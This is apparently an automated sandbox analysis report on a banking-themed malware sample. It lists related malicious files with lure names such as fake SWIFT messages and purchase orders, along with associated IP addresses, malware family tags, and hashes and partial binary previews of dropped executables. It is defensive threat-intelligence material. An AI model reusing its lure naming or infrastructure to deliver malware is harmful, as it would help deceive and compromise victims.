                                                                                                                                  PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                  • 54.244.188.177
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  UTMEMUSTeklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 132.192.108.101
                                                                                                                                  ORDER-2411250089.PDF.jsGet hashmaliciousWSHRat, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  Po-5865A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  JIL-_Document_No._2500015903.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  z705688y7t7tgggju97867756576.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  Viderefrt.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 132.226.8.169
                                                                                                                                  VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 132.226.247.73
                                                                                                                                  OVHFRSITHIPHORN_Doc2709202400000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • 188.165.135.205
                                                                                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 142.44.233.27
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.37.204.238
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 51.38.126.82
                                                                                                                                  UltraViewer_setup_6.6_en.zipGet hashmaliciousUnknownBrowse
                                                                                                                                  • 51.195.67.236
                                                                                                                                  https://go-pdf.online/abap-development-for-financial-accounting-custom-enhancements.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 46.105.201.240
                                                                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 198.27.117.138
                                                                                                                                  sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                  • 5.196.105.24
                                                                                                                                  botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 51.255.248.67
                                                                                                                                  nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                  • 145.239.10.162
                                                                                                                                  AMAZON-02USDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 18.139.62.226
                                                                                                                                  t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                  • 45.112.123.126
                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                  • 18.244.18.27
                                                                                                                                  https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6TgGet hashmaliciousUnknownBrowse
                                                                                                                                  • 76.76.21.98
                                                                                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 79.125.17.155
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.67.42.145
                                                                                                                                  x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 18.175.16.150
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.67.42.145
                                                                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 13.232.161.249
                                                                                                                                  http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 13.32.121.32
                                                                                                                                  AMAZON-02USDocs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 18.139.62.226
                                                                                                                                  t1gY0BGmOZ.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                  • 45.112.123.126
                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                  • 18.244.18.27
                                                                                                                                  https://share.fremontpeak.org/___.YzJ1OmNvZ2l3ZWIyOmM6bzpiNTEyZDAxNmZiN2I1MjU1MmE3OTQzOTdiZmE2NWEzZjo3OmQ0ZjU6ZDQ4OTQ1MWM1NjM2NzgxOWI0N2UyODgzNmYwYzIzOTkxYjZmOTA5ZjUyY2M5MTJiN2UzZTBiMmYwOTQ5NzhhNTpoOlQ6TgGet hashmaliciousUnknownBrowse
                                                                                                                                  • 76.76.21.98
                                                                                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 79.125.17.155
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.67.42.145
                                                                                                                                  x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 18.175.16.150
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 54.67.42.145
                                                                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                  • 13.232.161.249
                                                                                                                                  http://englobe.infralogin.com/passresetconfirm/ODA0MDY/6qb-fdbad004345ade5cc1bb/Get hashmaliciousUnknownBrowse
                                                                                                                                  • 13.32.121.32
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adQUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  rSolicita____odecota____o.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  inseminating.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  Teklif Talebi__77252662______PDF_PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  hesaphareketi-01-27112024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  Teklif_PDF.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                  • 172.67.177.134
                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0etnljashd27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  sdfgdsfkjg27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  tnkjasdhf27.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  #U8b49#U64da_89004161-000002102-66_20241128#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  SITHIPHORN_Doc2709202400000.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  Document BT24#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 172.67.74.152
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  C:\Users\user\AppData\Local\Temp\TrojanAI.exeOrder SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                    2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                      RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                          server_BTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                              server_BTC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                                    New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1290240
                                                                                                                                                      Entropy (8bit):5.277761528205587
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:xImGUcsvZZdubv7hfl3kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:xxGBcmlUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                      MD5:911868154988B08BC9EC4AF4D85832D3
                                                                                                                                                      SHA1:B2E4E0D0F2CC52DA43C3CC4690E3866494BFEE09
                                                                                                                                                      SHA-256:28585E10A6A982963B6F758254A4D6DB632DE3792F34AB627EB9F36731B89432
                                                                                                                                                      SHA-512:1CA33E0641C117844C3070E26B0C6E05CDB0B79049E0E0BB1004E8CEB49B4D4B31FC0916186E152FC582F886BC3109B90F59C0C347F7D8C18ACD1D9391D29B42
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\TrojanAI.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):410
                                                                                                                                                      Entropy (8bit):5.361827289088002
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                      MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                      SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                      SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                      SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):410
                                                                                                                                                      Entropy (8bit):5.361827289088002
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                      MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                      SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                      SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                      SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):520
                                                                                                                                                      Entropy (8bit):5.355496254154943
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                                                      MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                                                      SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                                                      SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                                                      SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2232
                                                                                                                                                      Entropy (8bit):5.380805901110357
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                                                                                                                      MD5:16AD599332DD2FF94DA0787D71688B62
                                                                                                                                                      SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                                                                                                                      SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                                                                                                                      SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                      Process:C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
                                                                                                                                                      MD5:8064E730487A7492200F210D929C8423
                                                                                                                                                      SHA1:65C892BE84C7B59DA335981E8B86CE5A53B40B6D
                                                                                                                                                      SHA-256:1FB3121DE3F8678B0F619CC88798A4C82BF240A3A8819829AC0E7D8F9D779549
                                                                                                                                                      SHA-512:A16D8D08AD3ACC371380E63D2748F268C02B0DD007DC77E0E85B3CB8A93486C47BC4046A11EF609B17528B83C1B0AA6F6881DECEC13DFEEECD0B9E7BD3EC4824
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:...TPJVDK0NQ.3H.HCZRTSJ.DO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJ.DO0@N.@3.M.b.S..k.,&Cn!G!T:%%c93:=%"d-Un#@ .!*h...t>%2!a=C[.N3HDHCZ:D.gz5.Nb .0.9.6qy-*l;.:D../.?.6h9.$.%.4dg!NR .0.k-6.+.*ai-:bA./g'P h9.$RTSJVDO0NQ5N3HDH.r.3SJVD.uNQyO7H0.C.RTSJVDO0.Q.O8IMHC.STS^\DO0NQ..3HDXCZR.RJVD.0NA5N3JDHFZRTSJVDJ0NQ5N3HD.WZRPSJ/.[0LQ5.3HTHCJRTSJFDO NQ5N3HTHCZRTSJVDO0.D7NcHDHC:PT.._DO0NQ5N3HDHCZRTSJVDO0NQ5N..EH_ZRTSJVDO0NQ5N3HDHCZRTSJVDO0.\7NsHDHCZRTSJVDO.OQ.O3HDHCZRTSJVDO0NQ5N3HDHCZRT}>3<;0NQ-.2HDXCZR.RJV@O0NQ5N3HDHCZRTsJV$aB*0A/3H.%CZR.RJV*O0N.4N3HDHCZRTSJVD.0N..*R<%HCZ.dSJVdM0NG5N3BFHCZRTSJVDO0NQuN3.j:0(1TSJV.]0N17N38VHCzPTSJVDO0NQ5N3H.HC.RTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0NQ5N3HDHCZRTSJVDO0
                                                                                                                                                      Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):231936
                                                                                                                                                      Entropy (8bit):5.039764014369673
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                      MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                      SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                      SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                      SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: Order SMG 201906 20190816order.pdf.scr.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: 2jbMIxCFsK.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                                                      • Filename: server_BTC.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: x.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: server_BTC.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                                                                      • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                                                                      • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1347584
                                                                                                                                                      Entropy (8bit):7.98998888129021
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:zwzLTl0gq+PA7yLFhaOsQtXW2ObJ/RLMHg80fMP0SLQycKxr6YIHb:qVI0hUQFOHQg80kP0a6YG
